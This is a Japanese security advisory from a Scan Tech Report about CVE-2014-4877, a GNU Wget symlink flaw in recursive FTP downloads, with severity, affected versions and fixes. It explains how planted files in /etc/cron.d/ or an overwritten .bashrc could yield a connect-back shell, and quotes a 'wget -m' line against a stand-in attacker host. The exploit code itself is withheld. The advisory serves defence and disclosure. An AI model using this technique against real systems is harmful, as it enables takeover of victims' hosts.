GNU Wget の再帰的な FTP ダウンロードにおけるシンボリックリンク処理に関する脆弱性(Scan Tech Report) | ScanNetSecurity
2026.05.19(火)

GNU Wget の再帰的な FTP ダウンロードにおけるシンボリックリンク処理に関する脆弱性(Scan Tech Report)

GNU プロジェクトが提供する Wget には、再帰的な FTP ダウンロードにおけるシンボリックリンク処理に関する脆弱性が存在します。

脆弱性と脅威 エクスプロイト
1.概要
GNU プロジェクトが提供する Wget には、再帰的な FTP ダウンロードにおけるシンボリックリンク処理に関する脆弱性が存在します。当該脆弱性が悪用されると、Wget を実行したシステム上の任意のファイルを、Wget の実行権限で操作される可能性があります。


2.深刻度(CVSS)
9.3
http://nvd.nist.gov/cvss.cfm?version=2&name=CVE-2014-4877&vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C)


3.影響を受けるソフトウェア
GNU Wget 1.16 より前のバージョン


4.解説
GNU プロジェクトが提供する Wget は、Web サーバからコンテンツ(ファイル)を取得する CUI プログラムです(*1)。Wget には、再帰的な FTP ダウンロードを実行した際のシンボリックリンクの扱いに不備があり、サーバから取得するディレクトリ一覧に細工されたシンボリックリンクファイルが含まれていると、Wget の実行権限で取得したファイルを攻撃者が指定したディレクトリに保存してしまいます。なお、同名のファイルが存在した場合には上書きされます。

このため、/etc/cron.d/ 配下に攻撃者が用意したファイルを保存されたり、.bashrc ファイルを上書きされたりすると、Wget の実行権限で意図しないコマンドが実行される可能性があります。例えば、コネクトバック通信を行うコマンドが実行された場合、標的側ホストが乗っ取られたりします。

本脆弱性は、攻撃者が能動的に攻撃することはできません。被害者が攻撃側ホストに対して、下記のように Wget による再帰的な FTP ダウンロードを実行した際に攻撃を受ける可能性があります。

wget -m ftp://攻撃側ホスト/

ただし、攻撃が成立した場合の影響度が大きいため、可能な限り対策を実施することを推奨します。

(*1): http://www.gnu.org/software/wget/


5.対策
下記の Web サイトから最新版を入手しプログラムを差し替える、またはディストリビュータが用意しているアップデートを適用することで、この脆弱性を解消することが可能です。

http://ftp.gnu.org/gnu/wget/
ftp://ftp.gnu.org/gnu/wget/

その他、下記の対策を実施することで、本脆弱性の影響を回避することが可能です。

・Wget 実行時に、retr-symlinks オプションをつける


6.ソースコード
(Web非公開)

(執筆:株式会社ラック サイバー・グリッド研究所

※Web非公開該当コンテンツ閲覧をご希望の方はScan Tech Reportにご登録(有料)下さい。

Scan Tech Report
http://scan.netsecurity.ne.jp/archives/51916302.html

《株式会社ラック デジタルペンテスト部》

関連記事

特集

PageTop

アクセスランキング

  1. デンソーグループのイタリア・モロッコ拠点に不正アクセス

    デンソーグループのイタリア・モロッコ拠点に不正アクセス

  2. 今日もどこかで情報漏えい 第48回「2026年4月の情報漏えい」“非表示シート Excel 警察” 待望論

    今日もどこかで情報漏えい 第48回「2026年4月の情報漏えい」“非表示シート Excel 警察” 待望論

  3. Webメール「Active!mail」に海外IPアドレスからDDoS攻撃

    Webメール「Active!mail」に海外IPアドレスからDDoS攻撃

  4. Windows DNS クライアントにリモートでコードが実行される脆弱性

    Windows DNS クライアントにリモートでコードが実行される脆弱性

  5. カー用品店「ジェームス」に不正アクセス、会員情報が漏えいした可能性

    カー用品店「ジェームス」に不正アクセス、会員情報が漏えいした可能性

ランキングをもっと見る
PageTop